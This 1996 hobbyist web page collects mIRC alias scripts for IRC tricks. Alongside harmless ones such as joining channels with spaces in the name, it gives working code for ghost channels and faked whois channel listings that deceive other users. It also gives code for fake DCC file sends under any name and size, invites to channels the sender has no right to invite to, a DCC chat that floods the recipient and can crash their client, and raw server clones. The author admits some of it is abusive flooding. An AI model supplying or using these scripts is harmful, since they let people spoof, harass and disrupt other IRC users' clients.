Welcome to mIRC Illusions Page. Here you'll find some stuff you might not know and probably shouldn't know, like making ghost channels and how to send fake DCC's.
Ghost Channels
Making ghost channels is really easy, all it takes is a couple lines in your Alias Section:
ghost {
join $$1 $+ $chr(160)
}
usage:
/ghost {channel}
/ghost #mirc
What this does is lets you join a channel with a blank character after it, but when people list out the channels they will see two identical channels - the real one and your ghost channel.
Faking Channels in your Whois
This is very similar to the ghost channel only we're adding a @{channel} after the ghost channel. All you need are these lines in your Alias Section:
fchan {
join $$1 $+ $chr(160) $+ @ $+ $$2
}
usage:
/fchan {channel1} {channel2}
/fchan #teen #dragonrealm
Now when someone does a whois on you it will show you as being @#teen @#dragonrealm.
Channels with Spaces in them
What this does is allows you to join a channel like "#The Scripters Guild" and instead of using the underscore '_' we use spaces. Here's what you need to add to the Alias Section:
j2 {
join $$1 $+ $chr(160) $+ $$2
}
j3 {
join $$1 $+ $chr(160) $+ $$2 $+ $chr(160) $+ $$3
}
usage:
/j2 #Fun Factory
/j3 #The Scripters Guild
What this does is place a blank character between the words which allows you to join or make channels using more than one word.
Fake DCC Sends
This will you allow you to make a valid DCC Send under any file name and any size. The person will receive the file like any other file, only it will be filled with a whole bunch of characters. Add this to your Alias Section:
fakedcc {
raw -q privmsg $$1 :DCC SEND $$2 3353362454 19 $$3
}
usage:
/fakedcc {nick/channel} {filename} {filesize}
/fakedcc TiAMaT mirc46.zip 7485739
/fakedcc #warez 0day.lst 12345
Thats all there is to it.
Fake Invites
Have you ever tried to invite someone to a channel you weren't in or weren't an op in. You probably got a message saying you weren't allowed. Well by using something similar to the 'ghost channel' you can invite anyone, anywhere. Add this to your Alias Section:
finvite {
invite $$1 $$2 $+ $chr(160)
}
usage:
/finvite {nick} {channel}
/finvite TiAMaT #mirc
Regardless of where you are they will be invited there.
Funny Invites
You can use anything for the invite, just remember that whoever you send it to will see the "{Your Nick} Invites You to Join ......" so you can go from there. You'll need to add a couple lines for each funny invite in your Alias Section:
fun1 {
invite $$1 the $+ $chr(160) $+ circus!
}
fun2 {
invite $$1 some $+ $chr(160) $+ other $+ $chr(160) $+ channel
}
usage:
/fun1 {nick}
/fun2 TiAMaT
Would look like "Your Nick(whatever@your.isp) invites you to join some other channel". Just remember to put the "$+ $chr(160) $+" between each word.
Garbled DCC Chat
This will send a dcc chat to someone and if they accept it, it will start sending a whole bunch of garbled text through the chat sometimes crashing their mIRC. Just add this to the Alias Section:
gchat {
raw -q privmsg $$1 :DCC CHAT blah 3353362454 19 blah
}
usage:
/gchat {nick/channel}
/gchat #warez
/gchat bOnEz
You won't have a DCC Chat window open, and you won't know if they accept it or not, but if they do they'll be getting a nice little flood.
Raw Server Clones
These are really alot of fun, they allow you to connect to a server through a DCC Chat Window. To do this you'll need to find the long IP of a server. First you'll need to get the IP of the server, this can be done by typing /dns {server} (ie /dns skypoint.dal.net) Now you can use any Long IP Converter to get the servers long IP. This will return a number like 3884325445, This is the server's long IP. Now you'll need to add this to your Alias Section:
chatclone {
raw -q privmsg $me :DCC CHAT CHAT $$1 $$2 $+
}
usage:
/chatclone {long IP} {port}
/chatclone 3884325445 6667
When you do this you will DCC Chat yourself - accept it. On the first line type "user anything anything anything anything" and on the second line type "nick {any nick}" and you'll see it connect you to the server. More info is available on this in The Raw Connections Page.
Disclaimer: I take no responsibility for how you use this information. Some of the information on this page IS considered abusive and flooding so should you get killed, k:lined, or dropped by your ISP don't come crying to me cause you were warned!
This page hosted by Get your own Free Homepage
©1996 The Scripters Guild All Rights Reserved
Please send all questions and comments to TiAMaT